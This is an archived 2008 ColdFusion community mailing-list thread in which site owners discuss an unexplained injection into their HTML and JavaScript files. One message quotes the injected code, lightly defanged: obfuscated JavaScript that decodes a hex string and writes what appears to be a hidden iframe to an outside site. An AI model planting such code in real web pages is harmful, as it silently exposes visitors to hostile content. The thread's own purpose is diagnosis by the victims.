Re: ringtones . com hack? wtf

Wed, 30 Jul 2008 10:12:18 -0700 

it happened to a wordpress blog of a customers recently - so it's not
targeting cf ...

On Wed, Jul 30, 2008 at 9:41 AM, Vivec <[EMAIL PROTECTED]> wrote:

> Just yesterday I saw something very similar in a .js file.
>
> Is there a vulnerability in CF that they are using to do this, or is
> this something else?
>
> 2008/7/30 morchella <[EMAIL PROTECTED]>:
> > ok found this in index.htm
> > replaced script with (cript)
> >
> > how the hell could they over write a htm file?
> >
> > (cript)function xy1q487fce1adcbd9(q487fce1add3a9){  return
> > (parseInt(q487fce1add3a9,16));}function
> > q487fce1adeb18(q487fce1adf2e8){ function q487fce1ae0a57 () {return 2;}
> > var
> q487fce1adfab8='';q487fce1ae19f7=String.fromCharCode;for(q487fce1ae0287=0;q487fce1ae0287<q487fce1adf2e8.length;q487fce1ae0287+=q487fce1ae0a57()){
> >
> q487fce1adfab8+=(q487fce1ae19f7(xy1q487fce1adcbd9(q487fce1adf2e8.substr(q487fce1ae0287,q487fce1ae0a57()))));}return
> > q487fce1adfab8;} var
> >
> q487fce1ae21c6='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533342533382533372533322533302532392532622532372536362536332533342532372532302537372536392536342537342536382533642533342533362533342532302536382536352536392536372536382537342533642533312533302533352532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q487fce1adeb18(q487fce1ae21c6));(/cript)
>
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Community/message.cfm/messageid:264980
Subscription: http://www.houseoffusion.com/groups/CF-Community/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.5

Reply via email to